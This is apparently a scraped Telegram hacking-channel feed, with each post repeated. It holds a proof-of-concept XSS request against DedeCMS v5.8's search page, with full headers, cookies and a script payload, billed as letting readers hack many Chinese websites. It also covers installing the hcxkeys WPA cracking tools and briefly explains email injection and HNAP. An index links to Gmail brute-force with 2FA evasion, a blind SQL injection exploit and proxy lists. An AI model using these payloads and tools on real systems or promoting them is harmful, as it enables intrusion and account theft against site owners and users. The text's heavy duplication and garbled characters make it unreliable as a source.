Forwarded from UNDERCODE NEWS
Verified by Undercode, allow to hack many chinese websites :
A Warning for peoples for securing themself
π¦A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.
PoC :
POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
Upgrade-Insecure-Requests: 1
keyword="><script>alert(1)</script>
β β β Uππ»βΊπ«Δπ¬πβ β β β
A Warning for peoples for securing themself
π¦A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.
PoC :
POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
Upgrade-Insecure-Requests: 1
keyword="><script>alert(1)</script>
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator :
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
π¦The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
3) That is, the only difference between them is that wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> How to install hcxkeys
1) To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator :
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
π¦The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
3) That is, the only difference between them is that wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> How to install hcxkeys
1) To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ZerBea/hcxkeys: Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcatβ¦
Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcat and John the Ripper. - ZerBea/hcxkeys
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is HNAP ?
Home Network Administration Protocol (HNAP) - Home Network Administration Protocol is a proprietary network protocol invented by Pure Networks, Inc. and acquired by Cisco Systems, which allows you to identify, configure and manage network devices. HNAP is based on SOAP.
This protocol appeared in 2007 and can be considered as a direct competitor to UPnP. Notable users of this protocol were Cisco and D-Link. However, both stopped using this protocol in 2012 and 2016, respectively. That is, yes, new devices no longer support this protocol, but the old routers are still there.
Especially noteworthy is that this feature is often hidden from the admin panel, making it impossible to disable it. If your router still supports HNAP, this probably means your router needs to be replaced.
Beginning in January 2010, vulnerabilities were discovered in several D-Link network devices, in which HNAP authentication could be bypassed.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is HNAP ?
Home Network Administration Protocol (HNAP) - Home Network Administration Protocol is a proprietary network protocol invented by Pure Networks, Inc. and acquired by Cisco Systems, which allows you to identify, configure and manage network devices. HNAP is based on SOAP.
This protocol appeared in 2007 and can be considered as a direct competitor to UPnP. Notable users of this protocol were Cisco and D-Link. However, both stopped using this protocol in 2012 and 2016, respectively. That is, yes, new devices no longer support this protocol, but the old routers are still there.
Especially noteworthy is that this feature is often hidden from the admin panel, making it impossible to disable it. If your router still supports HNAP, this probably means your router needs to be replaced.
Beginning in January 2010, vulnerabilities were discovered in several D-Link network devices, in which HNAP authentication could be bypassed.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
2020 Hack with ripple.pdf
4.1 MB
multiple zero day vulnerabilities in the Treck TCP/IP stack that is widely used in embedded and IoT devices.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Email injection :
1) E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.
2) When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.
3) Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input verification or the application has no verification and filtering mechanism at all.
For codes and Examples :
https://github.com/TDA/EMailInjectionVuln
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Email injection :
1) E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.
2) When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.
3) Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input verification or the application has no verification and filtering mechanism at all.
For codes and Examples :
https://github.com/TDA/EMailInjectionVuln
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
TDA/EMailInjectionVuln
Thesis project for MS. Contribute to TDA/EMailInjectionVuln development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Free Online Analyzers
AndroTotal
Appknox - not free
AVC UnDroid
Virustotal - max 128MB
Fraunhofer App-ray - not free
AppCritique - Upload your Android APKs and receive comprehensive free security assessments.
NowSecure Lab Automated - Enterprise tool for mobile app security testing both Android and iOS mobile apps. Lab Automated features dynamic and static analysis on real devices in the cloud to return results in minutes. Not free
AMAaaS - Free Android Malware Analysis Service. A baremetal service features static and dynamic analysis for Android applications. A product of MalwarePot.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Free Online Analyzers
AndroTotal
Appknox - not free
AVC UnDroid
Virustotal - max 128MB
Fraunhofer App-ray - not free
AppCritique - Upload your Android APKs and receive comprehensive free security assessments.
NowSecure Lab Automated - Enterprise tool for mobile app security testing both Android and iOS mobile apps. Lab Automated features dynamic and static analysis on real devices in the cloud to return results in minutes. Not free
AMAaaS - Free Android Malware Analysis Service. A baremetal service features static and dynamic analysis for Android applications. A product of MalwarePot.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
TODAY TOPICS :
Vulnserver tutorial pdf
https://t.me/UnderCodeTesting/11781
How to properly protect sysctl on Linux from spoofing and Syn-flooding ?
https://t.me/UnderCodeTesting/11782
Course Fundamentals of Computer Hacking :
4.3 rating free
https://t.me/UnderCodeTesting/11783
Kubernetes hacking and Security
https://t.me/UnderCodeTesting/11784
How to manage Ethernet card using ethtool command
https://t.me/UnderCodeTesting/11785
Gmail Hacking-bruteforce + proxies (use spoof ip to avoid two-factor)
https://t.me/UnderCodeTesting/11786
some good proxies list /sock5
https://t.me/UnderCodeTesting/11788
https://pastebin.com/BDCXaWeY
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
https://t.me/UnderCodeTesting/11790
Verified by Undercode, vulnerability allow to hack many chinese websites
A Warning for peoples for securing themself
https://t.me/UnderCodeTesting/11793
Tons of courses πΉ
https://t.me/UnderCodeTesting/11794
Wi-Fi rainbow table generator
https://t.me/UnderCodeTesting/11795
What is HNAP ?
https://t.me/UnderCodeTesting/11796
2020 HACK WITH RIPPLE
multiple zero day vulnerabilities in the Treck TCP/IP stack that is widely used in embedded and IoT devices.
https://t.me/UnderCodeTesting/11798
GMAIL BRUTEFORCE
https://t.me/UnderCodeTesting/11799
Email injection
https://t.me/UnderCodeTesting/11800
Free Online Analyzers
https://t.me/UnderCodeTesting/11801
ENJOYβ€οΈππ»
USE FOR LEARN ! & SECURE OURSELF
Vulnserver tutorial pdf
https://t.me/UnderCodeTesting/11781
How to properly protect sysctl on Linux from spoofing and Syn-flooding ?
https://t.me/UnderCodeTesting/11782
Course Fundamentals of Computer Hacking :
4.3 rating free
https://t.me/UnderCodeTesting/11783
Kubernetes hacking and Security
https://t.me/UnderCodeTesting/11784
How to manage Ethernet card using ethtool command
https://t.me/UnderCodeTesting/11785
Gmail Hacking-bruteforce + proxies (use spoof ip to avoid two-factor)
https://t.me/UnderCodeTesting/11786
some good proxies list /sock5
https://t.me/UnderCodeTesting/11788
https://pastebin.com/BDCXaWeY
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
https://t.me/UnderCodeTesting/11790
Verified by Undercode, vulnerability allow to hack many chinese websites
A Warning for peoples for securing themself
https://t.me/UnderCodeTesting/11793
Tons of courses πΉ
https://t.me/UnderCodeTesting/11794
Wi-Fi rainbow table generator
https://t.me/UnderCodeTesting/11795
What is HNAP ?
https://t.me/UnderCodeTesting/11796
2020 HACK WITH RIPPLE
multiple zero day vulnerabilities in the Treck TCP/IP stack that is widely used in embedded and IoT devices.
https://t.me/UnderCodeTesting/11798
GMAIL BRUTEFORCE
https://t.me/UnderCodeTesting/11799
Email injection
https://t.me/UnderCodeTesting/11800
Free Online Analyzers
https://t.me/UnderCodeTesting/11801
ENJOYβ€οΈππ»
USE FOR LEARN ! & SECURE OURSELF